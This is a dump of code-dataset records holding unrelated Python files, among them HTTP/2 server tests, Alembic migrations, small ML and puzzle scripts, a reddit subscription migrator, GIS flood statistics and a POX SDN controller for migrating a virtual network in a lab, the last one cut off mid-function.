5),\n ]\n ]\n #\n # header frame = 9 header bytes + 27 header block bytes, headers are in 2-4 chunks\n segment_size = 9 # headers - 27 bytes (3 chunks)\n\n\nclass HttpBodyChunkCntH2(HttpHeaderChunkCntH2Base, HttpBodyChunkCnt):\n \"\"\"Tempesta counts only bytes of body.\"\"\"\n\n requests = [\n (\n [\n (\":authority\", \"example.com\"),\n (\":path\", \"/\"),\n (\":scheme\", \"https\"),\n (\":method\", \"POST\"),\n ],\n \"x\" * 4,\n ),\n ]\n segment_size = 1 # request body - 4 bytes (4 chunks)\n","repo_name":"tempesta-tech/tempesta-test","sub_path":"t_frang/test_http_body_and_header_chunk_cnt.py","file_name":"test_http_body_and_header_chunk_cnt.py","file_ext":"py","file_size_in_byte":4547,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"78"} +{"seq_id":"38546685231","text":"def claim_fabric(claims):\n fabric = [[0]*1000 for i in range(1000)]\n\n for claim in claims:\n claim_split = claim.split()\n x, y = claim_split[2].replace(':', '').split(',')\n width, height = claim_split[3].split('x')\n\n x = int(x)\n y = int(y)\n width = int(width)\n height = int(height)\n\n for j in range(y, y + height):\n for k in range(x, x + width):\n fabric[j][k] += 1\n\n return fabric\n\n\ndef count_overlaps(fabric):\n overlaps = 0\n\n for row in fabric:\n overlaps += sum(1 for coord in row if coord > 1)\n\n return overlaps\n\n\ndef main():\n claims = open(\"input.txt\")\n fabric = claim_fabric(claims)\n overlaps = count_overlaps(fabric)\n return overlaps\n\n\nprint(main())\n","repo_name":"johnsickels/advent-of-code","sub_path":"2018/three/one.py","file_name":"one.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"31857997468","text":"import sklearn\nfrom sklearn import datasets\nfrom sklearn import svm\nfrom sklearn.neighbors import KNeighborsClassifier\n\ncancer= datasets.load_breast_cancer()\n\nprint(cancer.feature_names)\n\n# //classify into either malignant or benign\nprint(cancer.target_names)\n\nX=cancer.data\ny=cancer.target\n\n#split the data into training and test\n#use k nearest neighbour classification\nx_train, x_test, y_train, y_test = sklearn.model_selection.train_test_split(X, y, test_size = 0.1)\n\nmodel = KNeighborsClassifier(n_neighbors=9)\n\nmodel.fit(x_train , y_train)\n\naccuracy = model.score(x_test , y_test)\nprint(accuracy)\n\n#make predictions\npredicted = model.predict(x_test)\n\n\n#output\noutput = ['malignant' , 'benign']\nfor i in range(len(predicted)):\n print(\"For the values \" , x_test[i])\n print(\"The predicted value is\" , output[predicted[i]])\n print(\"The actual value is \" , output[y_test[i]])","repo_name":"IshanPoudel/GradeCalculationUsingML","sub_path":"Support_Vector_Machines/cancer_prediction_using_knn.py","file_name":"cancer_prediction_using_knn.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18713866612","text":"\"\"\"empty message\n\nRevision ID: 40dea8107299\nRevises: 1d1cabe0f58e\nCreate Date: 2020-08-17 20:01:58.553252\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '40dea8107299'\ndown_revision = '1d1cabe0f58e'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('Area',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('city', sa.String(length=120), nullable=True),\n sa.Column('state', sa.String(length=120), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.drop_column('Venue', 'state')\n op.drop_column('Venue', 'city')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('Venue', sa.Column('city', sa.VARCHAR(length=120), autoincrement=False, nullable=True))\n op.add_column('Venue', sa.Column('state', sa.VARCHAR(length=120), autoincrement=False, nullable=True))\n op.drop_table('Area')\n # ### end Alembic commands ###\n","repo_name":"ZiadEzat/project-fyyur","sub_path":"migrations/versions/40dea8107299_.py","file_name":"40dea8107299_.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37703187307","text":"\"\"\"Simple example of two SST components playing pingpong with messages.\"\"\"\n\nfrom ahp_graph.DeviceGraph import *\nfrom ahp_graph.SSTGraph import *\nfrom architecture import architecture\n\n\nif __name__ == \"__main__\":\n \"\"\"\n If we are running as a script (either via Python or from SST), then\n proceed. Check if we are running with SST or from Python.\n \"\"\"\n import argparse\n try:\n import sst # type: ignore[import]\n SST = True\n except ImportError:\n SST = False\n\n parser = argparse.ArgumentParser(description='PingPong')\n parser.add_argument('--num', type=int, default=3,\n help='how many pingpongs to include')\n parser.add_argument('--rank', type=int, default=0,\n help='which rank to generate the JSON file for')\n parser.add_argument('--repeats', type=int, default=5,\n help='how many message volleys to run')\n parser.add_argument('--partitioner', type=str, default='sst',\n help='which partitioner to use: ahp_graph, sst')\n args = parser.parse_args()\n\n # Construct a DeviceGraph with the specified architecture\n graph = architecture(args.repeats, args.num)\n sstgraph = SSTGraph(graph)\n\n if SST:\n # If running within SST, generate the SST graph\n # There are multiple ways to run, below are two examples\n\n # SST partitioner\n # This will work in serial or running SST with MPI in parallel\n if args.partitioner.lower() == 'sst':\n sstgraph.build()\n\n # MPI mode with ahp_graph graph partitioning. 
Specifying nranks tells\n # ahp_graph that it is doing the partitioning, not SST\n # For this to work you need to pass --parallel-load=SINGLE to sst\n elif args.partitioner.lower() == 'ahp_graph':\n sstgraph.build(args.num)\n\n else:\n # SST partitioner\n # This will generate a flat dot graph and a single JSON file\n if args.partitioner.lower() == 'sst':\n graph.flatten()\n graph.write_dot('pingpongFlat', draw=True, ports=True, hierarchy=False)\n sstgraph.write_json('pingpongFlat')\n\n # If ahp_graph is partitioning, we generate a hierarchical DOT graph\n # and a JSON file for the rank that is specified from the command line\n elif args.partitioner.lower() == 'ahp_graph':\n if args.rank == 0:\n graph.write_dot('pingpong', draw=True, ports=True)\n sstgraph.write_json('pingpong', nranks=args.num, rank=args.rank)\n","repo_name":"lpsmodsimteam/ahp_graph","sub_path":"examples/pingpong/sst/pingpong.py","file_name":"pingpong.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"3677974420","text":"\"\"\"empty message\n\nRevision ID: ceb7e1bed7c2\nRevises: 7098b8533cbf\nCreate Date: 2021-03-13 20:56:32.768354\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'ceb7e1bed7c2'\ndown_revision = '7098b8533cbf'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('user_seasons', sa.Column('episode', sa.Integer(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('user_seasons', 'episode')\n # ### end Alembic commands ###\n","repo_name":"kuna728/raspigo","sub_path":"migrations/versions/ceb7e1bed7c2_.py","file_name":"ceb7e1bed7c2_.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10323135291","text":"import pandas as pd\nimport numpy as np\nnp.seterr(divide = 'ignore') \n\ndef rsj_funct(data, consulta):\n #numDocs = data.count(axis=1)[0]\n numDocs = 1000\n a = (consulta*data)\n numDocsWord = a[a>1]\n numDocsWord = numDocsWord.count()\n numDocsWord = numDocsWord[numDocsWord != 0]\n result = np.log((numDocs - numDocsWord + 0.5) / (numDocsWord + 0.5))\n return result\n\ndata = pd.read_csv('datos.txt')\ndata = data.set_index('documento')\nconsulta = [0,0,1,0,1,0,0,0,0,1,0,1,0,0,0,0,1,0,1,0]\n\nrsj = rsj_funct(data, consulta)\n\nlongDoc = data.sum(axis=1)\navgLong = np.mean(longDoc)\nnormLong = longDoc/avgLong\n\nnumerador = data.mul(rsj, axis =1)\ndenominador = data.add(normLong, axis = 0)\n\nresult = numerador.div(denominador, axis = 0)\nprint(result.sum(axis = 1).sort_values(ascending=False))","repo_name":"Jarostegui/Information-retrieval-assigments","sub_path":"P3/bm25.py","file_name":"bm25.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14219855843","text":"'''\n设置上下左右四条边界 动态调整四条边界\n参考 https://leetcode-cn.com/problems/shun-shi-zhen-da-yin-ju-zhen-lcof/solution/mian-shi-ti-29-shun-shi-zhen-da-yin-ju-zhen-she-di/\n'''\nclass Solution:\n def spiralOrder(self, matrix: List[List[int]]) -> List[int]:\n if not matrix:\n return matrix\n left,top,right,bottom = 0,0,len(matrix[0])-1,len(matrix)-1\n result = []\n while True:\n #从左到右\n for i in 
range(left,right+1):\n result.append(matrix[top][i])\n top +=1\n #从上到下\n if top>bottom:break\n for i in range(top,bottom+1):\n result.append(matrix[i][right])\n right -= 1\n #从右到左\n if left>right:break\n for i in range(right,left-1,-1):\n result.append(matrix[bottom][i])\n bottom-=1\n if top>bottom:break\n #从下到上\n for i in range(bottom,top-1,-1):\n result.append(matrix[i][left])\n left+=1\n if left>right:break\n return result","repo_name":"KyleC14/SwordToOfferPractice","sub_path":"code/Question29/Solution2.py","file_name":"Solution2.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2749733565","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 20 19:57:09 2019\n\n@author: dbosami2\n\"\"\"\n\nimport pandas as pd\n\ndata=pd.read_csv('airquality.csv')\nozone_mean= data.Ozone.mean()\n\n#replace missing valueswith mean\n\ndata['Ozone']= data.Ozone.fillna(ozone_mean)\n\nprint(data)","repo_name":"dashanbosamia/data-science","sub_path":"pg5.py","file_name":"pg5.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7415153832","text":"\"\"\"\nThis file will out put a CSV file for each of the flood levels, the CSV file will contain data for all the roads which\nare flooded. In the Python console the total length of road flooded for each flood level as well as a count of the\ndifferent class of roads flooded will be output.\n\n\"\"\"\n\nimport os.path\nimport geopandas as gpd\nimport pandas as pd\n\n# Load the datasets\nloughs = gpd.read_file(os.path.abspath('data_files/major_loughs.shp'))\nroads = gpd.read_file(os.path.abspath('data_files/Fermanagh roads.shp'))\nFloodOne = gpd.read_file(os.path.abspath('data_files/FloodOne.shp'))\nFloodTwo = gpd.read_file(os.path.abspath('data_files/FloodTwo.shp'))\nFloodThree = gpd.read_file(os.path.abspath('data_files/FloodThree.shp'))\nFloodFour = gpd.read_file(os.path.abspath('data_files/FloodFour.shp'))\nFloodFive = gpd.read_file(os.path.abspath('data_files/FloodFive.shp'))\n\n# Intersect operation to find roads already crossing the lough polygon, these are bridges.\nbridges = gpd.overlay(roads, loughs, how='intersection')\n\n# Intersect operation to find the roads intersected by the different flood levels\nFloodOneRoads = gpd.overlay(roads, FloodOne, how='intersection')\nFloodTwoRoads = gpd.overlay(roads, FloodTwo, how='intersection')\nFloodThreeRoads = gpd.overlay(roads, FloodThree, how='intersection')\nFloodFourRoads = gpd.overlay(roads, FloodFour, how='intersection')\nFloodFiveRoads = gpd.overlay(roads, FloodFive, how='intersection')\n\n# Rename the primary key column in bridges dataset\nbridges = bridges.rename(columns={'OBJECTID_1': 'Key'})\n\n# Spatial Difference Operation\nspatial_joinOne = gpd.sjoin(FloodOneRoads, bridges, how='left', predicate='intersects')\nFloodOneFinal = spatial_joinOne[spatial_joinOne.index_right.isna()]\nFloodOneFinal.to_csv('outputs/FloodOne.csv')\n\nspatial_joinTwo = gpd.sjoin(FloodTwoRoads, bridges, how='left', predicate='intersects')\nFloodTwoFinal = spatial_joinTwo[spatial_joinTwo.index_right.isna()]\nFloodTwoFinal.to_csv('outputs/FloodTwo.csv')\n\nspatial_joinThree = gpd.sjoin(FloodThreeRoads, bridges, how='left', predicate='intersects')\nFloodThreeFinal = spatial_joinThree[spatial_joinThree.index_right.isna()]\nFloodThreeFinal.to_csv('outputs/FloodThree.csv')\n\nspatial_joinFour = gpd.sjoin(FloodFourRoads, 
bridges, how='left', predicate='intersects')\nFloodFourFinal = spatial_joinFour[spatial_joinFour.index_right.isna()]\nFloodFourFinal.to_csv('outputs/FloodFour.csv')\n\nspatial_joinFive = gpd.sjoin(FloodFiveRoads, bridges, how='left', predicate='intersects')\nFloodFiveFinal = spatial_joinFive[spatial_joinFive.index_right.isna()]\nFloodFiveFinal.to_csv('outputs/FloodFive.csv')\n\nFloodInputs = ['outputs/FloodOne.csv', 'outputs/FloodTwo.csv', 'outputs/FloodThree.csv',\n 'outputs/FloodFour.csv', 'outputs/FloodFive.csv']\nfor FloodInput in FloodInputs:\n # Read the CSV file into a DataFrame\n data = pd.read_csv(FloodInput)\n\n # Find the empty columns\n empty_columns = data.columns[data.isnull().all()]\n\n # Find the populated columns\n populated_columns = data.columns[data.notnull().any()]\n\n # Filter the DataFrame to keep only the populated columns\n data = data[populated_columns]\n\n # Define the output filename\n output_filename = FloodInput.replace('.csv', 'Final.csv')\n\n # Save the modified DataFrame to a new CSV file\n data.to_csv(output_filename, index=False)\n\n# Select the length column from each flood csv file\nLengthOne = FloodOneFinal['Length_left']\nLengthTwo = FloodTwoFinal['Length_left']\nLengthThree = FloodThreeFinal['Length_left']\nLengthFour = FloodFourFinal['Length_left']\nLengthFive = FloodFiveFinal['Length_left']\n\n# Select the class column from each flood csv file\nCountOne = FloodOneFinal['CLASS_left']\nCountTwo = FloodTwoFinal['CLASS_left']\nCountThree = FloodThreeFinal['CLASS_left']\nCountFour = FloodFourFinal['CLASS_left']\nCountFive = FloodFiveFinal['CLASS_left']\n\n# Print the total length of roads flooded as well as a count of the types of roads affected by the floods\nFloodOneLength = LengthOne.sum()/1000\nprint('Total length of roads flooded by the lough rising by 1m is {} kilometers'.format(FloodOneLength))\nFloodOneCount = CountOne.value_counts()\nprint('A count of all the class of roads affected by the floods')\nprint(FloodOneCount)\nFloodTwoLength = LengthTwo.sum()/1000\nprint('Total length of roads flooded by the lough rising by 2m is {} kilometers'.format(FloodTwoLength))\nFloodTwoCount = CountTwo.value_counts()\nprint('A count of all the class of roads affected by the floods')\nprint(FloodTwoCount)\nFloodThreeLength = LengthThree.sum()/1000\nprint('Total length of roads flooded by the lough rising by 3m is {} kilometers'.format(FloodThreeLength))\nFloodThreeCount = CountThree.value_counts()\nprint('A count of all the class of roads affected by the floods')\nprint(FloodThreeCount)\nFloodFourLength = LengthFour.sum()/1000\nprint('Total length of roads flooded by the lough rising by 4m is {} kilometers'.format(FloodFourLength))\nFloodFourCount = CountFour.value_counts()\nprint('A count of all the class of roads affected by the floods')\nprint(FloodFourCount)\nFloodFiveLength = LengthFive.sum()/1000\nprint('Total length of roads flooded by the lough rising by 5m is {} kilometers'.format(FloodFiveLength))\nFloodFiveCount = CountFive.value_counts()\nprint('A count of all the class of roads affected by the floods')\nprint(FloodFiveCount)","repo_name":"mulhollandc31/egm722project","sub_path":"Flood_Stats.py","file_name":"Flood_Stats.py","file_ext":"py","file_size_in_byte":5345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8638232336","text":"n = int(input())\narr = []\nfor _ in range(n):\n arr.append(list(map(int, input().split())))\n\nnm = 0\nnp = 0\nnz = 0\n\n\ndef cut(x, y, n):\n global nm, np, 
nz\n\n num_check = arr[x][y]\n for i in range(x, x+n):\n for j in range(y, y+n):\n if(arr[i][j] != num_check):\n for k in range(3):\n for l in range(3):\n cut(x+k*n//3, y+l*n//3, n//3)\n return\n\n if num_check == -1:\n nm += 1\n elif num_check == 0:\n nz += 1\n elif num_check == 1:\n np += 1\n\n\ncut(0, 0, n)\nprint(nm)\nprint(nz)\nprint(np)\n","repo_name":"yangwooseong/algorithm","sub_path":"boj/1780.py","file_name":"1780.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22777235484","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\nimport setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"myBox-qutaishat\",\n version=\"0.0.1\",\n author=\"Samah qutaishat\",\n author_email=\"samah-samir-a--alkayed.ktaishat@edu.dsti.institute\",\n description=\"myBox offers utility classes and functions for dealing with the DSTI combined SQL & Python project\",\n url=\"\",\n packages=setuptools.find_packages(),\n python_requires='>=3.6',\n)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"samahalkayedktaishat/SQL-and-Software-Engineering-Project-","sub_path":"Python_SQL_Project_DS_SAMAH/myBox/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72625306172","text":"# Adapted from leemi's migratereddit.py on GitHub Gist (https://gist.github.com/leemi/e36e8c056aff7990baad28de6e7458d1)\n# Old version was in Pythohn 2 and was using an out-dated version of praw\n\nimport praw\nfrom prawcore.exceptions import Forbidden\nimport settings \t# Reddit account info in settings.py\nfrom tqdm import tqdm\n\n# Load account info\nold_account, new_account = settings.reddit_init()\n\n# Remove default subreddits\nfor sub in tqdm(new_account.user.subreddits(limit=None)):\n\tsub.unsubscribe()\n\nnum_subs_old_account = 0\n\n# Copy Subreddits\nfor sub in tqdm(old_account.user.subreddits(limit=None)):\n\tnum_subs_old_account = num_subs_old_account + 1\n\ttry:\n\t\tnew_account.subreddit(sub.display_name).subscribe()\n\texcept Forbidden: \n\t\t# Usually occurs for user accounts that the account is following (u_username)\n\t\tprint(\"\\nManually subscribe - automatic subscription failed: \" + sub.display_name)\n\n# Sanity check\nnum_subs_new_account = 0\nfor sub in new_account.user.subreddits(limit=None):\n\tnum_subs_new_account = num_subs_new_account + 1\nprint(\"Number of subscribed subreddits for old account: \" + str(num_subs_old_account))\nprint(\"Number of subscribed subreddits for new account: \" + str(num_subs_new_account))","repo_name":"erin-bristow/reddit-account-migration","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25007323358","text":"people = int(input())\nlifts = [int(i) for i in input().split()]\navailable_seats = len(lifts) * 4 - sum(lifts)\n\nis_no_people_left = False\npeople_that_will_need_to_wait = 0\nfull_fit = True if people == available_seats else False\nif people >= available_seats:\n people_that_will_need_to_wait = people - available_seats\n lifts = [4 for i in range(len(lifts))]\nelse:\n for i, free_seats_in_lift in enumerate(lifts):\n for j in range(4 - free_seats_in_lift):\n people -= 1\n lifts[i] += 1\n if people == 0:\n is_no_people_left = True\n # all 
people have seats in the lift\n break\n if is_no_people_left:\n break\n\nif not full_fit:\n if is_no_people_left:\n print(\"The lift has empty spots!\")\n else:\n print(f\"There isn't enough space! {people_that_will_need_to_wait} people in a queue!\")\n\nprint(\" \".join([str(i) for i in lifts]))\n","repo_name":"Yordanofff/SoftUniPython","sub_path":"Fundamentals/Fundamentals - Exams/01. Programming Fundamentals Mid Exam Retake/02. The Lift.py","file_name":"02. The Lift.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33112175066","text":"import uuid\r\nimport math\r\nimport string\r\n\r\nimport pygame\r\nfrom pygame.sprite import Sprite\r\nimport actors\r\nfrom actors import *\r\nimport imageutils\r\n\r\nfrom vector2 import Vector2\r\n\r\nclass Shape(Sprite):\r\n loaded_images = {}\r\n\r\n def __init__(self, texture_path, size, rotation, shape_type, color):\r\n Sprite.__init__(self) #call Sprite intializer\r\n self.id = uuid.uuid1()\r\n \r\n self.rotation = rotation\r\n self.size = size\r\n self.texture_path = texture_path\r\n self.color = color\r\n \r\n self.image = pygame.transform.scale(self.getfile(self.texture_path), (self.size, self.size))\r\n self.rect = self.image.get_rect();\r\n \r\n self.original = self.image;\r\n \r\n self.bounding = self.rect.inflate(-self.rect.width/2.25, -self.rect.height/2.25) \r\n self.pointvalue = 0\r\n if shape_type == actors.Octagon.shape_type:\r\n self.pointvalue = 800\r\n elif shape_type == actors.Hexagon.shape_type:\r\n self.pointvalue = 800\r\n elif shape_type == actors.Pentagon.shape_type:\r\n self.pointvalue = 500\r\n elif shape_type == actors.Square.shape_type:\r\n self.pointvalue = 400\r\n elif shape_type == actors.Tri.shape_type:\r\n self.pointvalue = 300\r\n \r\n self.directionx = 1\r\n self.directiony = 0\r\n \r\n self.last_location = None\r\n self.last_vector = None\r\n self.parent = None\r\n \r\n self.randirx = 0\r\n self.randiry = 0\r\n \r\n def update(self, delta):\r\n if self.last_location:\r\n self.last_vector = Vector2.from_points(self.last_location, (self.rect.x, self.rect.y))\r\n \r\n self.rect.move_ip((self.randirx, self.randiry))\r\n \r\n center = self.rect.center\r\n self.image = pygame.transform.rotate(self.original, self.rotation)\r\n self.rect = self.image.get_rect(center=center)\r\n self.bounding = self.rect.inflate(-self.rect.width/2.25, -self.rect.height/2.25) \r\n \r\n self.last_location = (self.rect.x, self.rect.y)\r\n \r\n \r\n def getfile(self, texture_path):\r\n if texture_path in Shape.loaded_images:\r\n return Shape.loaded_images[texture_path]\r\n else:\r\n image, rect = imageutils.load_image(texture_path, -1)\r\n rect = image.get_rect(center=rect.center)\r\n rect.move_ip((-image.get_width()/2, -image.get_height()/2))\r\n Shape.loaded_images[texture_path] = image\r\n return image\r\n \r\n @classmethod\r\n def build_texture_path(self, color, shape_type):\r\n return \"%s_%s.png\" % (color, shape_type)\r\n \r\n def rotate_direction(self, angle_degrees):\r\n radians = math.radians(angle_degrees)\r\n cos = math.cos(radians)\r\n sin = math.sin(radians)\r\n x = cos\r\n y = sin\r\n self.directionx = x\r\n self.directiony = y","repo_name":"ivanvenosdel/colored-shapes","sub_path":"actors/shape.py","file_name":"shape.py","file_ext":"py","file_size_in_byte":2971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13257102145","text":"#Programa de cálculo de média 
utilizando 3 notas\r\n\r\nnota1 = float(input('Sua Primeira Nota: '))\r\nnota2 = float(input('Sua Segunda Nota: '))\r\nnota3 = float(input('Sua Terceira Nota: '))\r\nmedia = (nota1 + nota2 + nota3) / 3\r\nprint('Com as notas {:.1f}, {:.1f} e {:.1f}, a média do aluno é {:.1f}'.format(nota1, nota2, nota3, media))\r\nif 7 > media >=5:\r\n print('O Aluno está em RECUPERAÇÃO!')\r\nelif media < 5:\r\n print('O Aluno está REPROVADO!')\r\nelif media >=7:\r\n print('O Aluno está APROVADO!')","repo_name":"swapnes/problema2-python","sub_path":"resolução problema.py","file_name":"resolução problema.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15521829350","text":"from pox.core import core\nfrom pox.lib.util import dpidToStr\nimport pox.openflow.libopenflow_01 as of\nimport json\nimport os\nimport time\n\nimport threading\nimport remote_cmd\n\n# include as part of the betta branch\nfrom pox.openflow.of_json import *\n\novs2_tcpdump_duration = \"60s\"\novs1_dpid = 1\novs2_dpid = 2\novs3_dpid = 3\novs4_dpid = 4\novs5_dpid = 5\novs6_dpid = 6\ng1_dpid = 7\ng2_dpid = 8\ng3_dpid = 9\nt4_dpid = 16\nhost1_IP = '172.17.5.15'\nhost2_IP = '172.17.5.17'\nhost3_IP = '172.17.5.18'\ng1_IP = '128.163.232.65'\ng2_IP = '128.163.232.67'\ng3_IP = '128.163.232.68'\nhost1 = '10.10.1.1'\nhost2 = '10.10.1.4'\nhost3 = '10.10.1.6'\novs1_IP = '128.163.232.77'\novs2_IP = '128.163.232.82'\novs3_IP = '128.163.232.84'\novs4_IP = '128.163.232.95'\novs5_IP = '128.163.232.104'\novs6_IP = '128.163.232.105'\nt4_IP = '128.163.232.106'\n\nflow_table = {}\n\nlog = core.getLogger()\n\n\n# migrate virtual network\ndef _migrate_vn ():\n threading.Timer(10,_initial_config).start()\n \n client_cmd = 'iperf -c 10.10.1.6 -u -t 100'\n threading.Timer(30, _iperf, args=(host2_IP, client_cmd, )).start()\n\n # start migration after 1 minute\n log.info(\"start timer: start migration after 1 minutes\")\n threading.Timer(60, start_migration).start()\n\ndef _initial_config():\n log.info(\"initial configuration starts\")\n _initialize_sw()\n _config_gateway(1)\n \n \ndef _initialize_sw():\n log.info('install rules on vn-2 to direct all traffic to tunnel switch')\n for connection in core.openflow.connections.values():\n if connection.dpid == ovs4_dpid:\n _install_path_by_port(connection, 2, 1)\n _install_path_by_port(connection, 3, 1)\n _install_path_by_port(connection, 4, 1)\n elif connection.dpid == ovs5_dpid:\n _install_path_by_port(connection, 2, 1)\n _install_path_by_port(connection, 3, 1)\n elif connection.dpid == ovs6_dpid:\n _install_path_by_port(connection, 1, 2)\n _install_path_by_port(connection, 3, 2)\n elif connection.dpid == t4_dpid:\n _install_path_by_port(connection, 4, 2)\n _install_path_by_port(connection, 2, 4)\n _install_path_by_port(connection, 1, 6)\n _install_path_by_port(connection, 6, 1)\n _install_path_by_port(connection, 5, 3)\n _install_path_by_port(connection, 3, 5)\n \ndef _install_path_by_port(connection, in_port, out_port):\n msg1 = of.ofp_flow_mod()\n msg1.match.in_port = in_port\n action = of.ofp_action_output(port = out_port)\n msg1.actions.append(action)\n connection.send(msg1)\n\n\ndef _config_gateway(vn_id):\n log.info('install initial rules on gateways')\n in_port = 0\n out_port = 0\n drop_port = 0\n for connection in core.openflow._connections.values():\n\n if vn_id == 1:\n if connection.dpid == g1_dpid:\n in_port = 1\n out_port = 2\n drop_port = 3\n elif connection.dpid == g2_dpid:\n in_port = 1\n out_port = 
2\n drop_port = 3\n elif connection.dpid == g3_dpid:\n in_port = 1\n out_port = 2\n drop_port = 3\n else:\n continue\n elif vn_id == 2:\n if connection.dpid == g1_dpid:\n in_port = 3\n out_port = 1\n drop_port = 2\n elif connection.dpid == g2_dpid:\n in_port = 1\n out_port = 3\n drop_port = 2\n elif connection.dpid == g3_dpid:\n in_port = 1\n out_port = 3\n drop_port = 2\n else:\n continue\n \n _gw_to_vn(connection, in_port, out_port, drop_port)\n\n\ndef _gw_to_vn(connection, in_port, out_port, drop_port):\n _delete_flow_tables(connection)\n\n msg1 = of.ofp_flow_mod()\n msg1.match.in_port = in_port\n action = of.ofp_action_output(port = out_port)\n msg1.actions.append(action)\n connection.send(msg1)\n\n msg2 = of.ofp_flow_mod()\n msg2.match.in_port = out_port\n action = of.ofp_action_output(port = in_port)\n msg2.actions.append(action)\n connection.send(msg2)\n\n msg3 = of.ofp_flow_mod()\n msg3.match.in_port = drop_port\n connection.send(msg3)\n\ndef _iperf(IP, cmd):\n t = threading.Thread(target=remote_cmd.ssh_run_cmd, args=(IP, cmd, ))\n _config_gateway(1)\n time.sleep(5)\n t.start()\n\n# start migration: copy the rules from old switches to new switches\ndef start_migration():\n log.info(\"Start migration...\")\n global start_time\n start_time = time.time()\n\n log.info('move ovs1')\n\n log.info('bring down the interfaces in ovs1')\n remote_cmd.ssh_run_cmd(ovs1_IP, 'sudo ifconfig eth2 down;sudo ifconfig eth3 down')\n\n log.info('request flow tables in ovs-1')\n for connection in core.openflow._connections.values():\n if connection.dpid == ovs1_dpid:\n _request_flow_info(connection)\n\n\ndef _request_flow_info(connection):\n connection.send(of.ofp_stats_request(body=of.ofp_flow_stats_request()))\n log.debug(\"Sent %i flow/port stats request(s)\", len(core.openflow._connections))\n\n\n# handler to display flow statistics received in JSON format\n# structure of event.stats is defined by ofp_flow_stats()\ndef _handle_flowstats_received (event):\n stats = flow_stats_to_list(event.stats)\n log.debug(\"FlowStatsReceived from %s: %s\", \n dpidToStr(event.connection.dpid), stats)\n\n #store flow tables in local\n flow_table[event.connection.dpid] = stats\n\n #insert the flow enries into the new switches\n _insert_flow_entries(event)\n\n _set_tunnel_rule(event)\n\n # send barrier message to ensure all flows has been installed \n event.connection.send(of.ofp_barrier_request(xid=0x80000000))\n event.connection.addListenerByName(\"BarrierIn\", _handle_flow_ready)\n\ndef _set_tunnel_rule(event):\n if event.connection.dpid == ovs1_dpid:\n log.info('install rules on ovs-1 to direct traffic from/to tunnel')\n _delete_flow_tables(event.connection)\n _install_path_by_port(event.connection, 1, 4)\n _install_path_by_port(event.connection, 4, 1)\n elif event.connection.dpid == ovs2_dpid:\n log.info('install rules on ovs-2 to direct traffic from/to tunnel')\n _delete_flow_tables(event.connection)\n _install_path_by_port(event.connection, 1, 3)\n _install_path_by_port(event.connection, 3, 1)\n\n log.info('bring back the original flow tables on ovs-4')\n _bring_ovs_back(ovs1_dpid, flow_table[ovs1_dpid])\n elif event.connection.dpid == ovs3_dpid:\n log.info('bring back the original flow tables on ovs-5')\n _bring_ovs_back(ovs2_dpid, flow_table[ovs2_dpid])\n\n\n\n# insert rules to new switch\ndef _insert_flow_entries(event):\n stats = flow_stats_to_list(event.stats)\n port_dict = {}\n insert_sw_id = 0\n if event.connection.dpid == ovs1_dpid:\n port_dict = {2:2,3:3,4:1}\n insert_sw_id = ovs4_dpid\n elif 
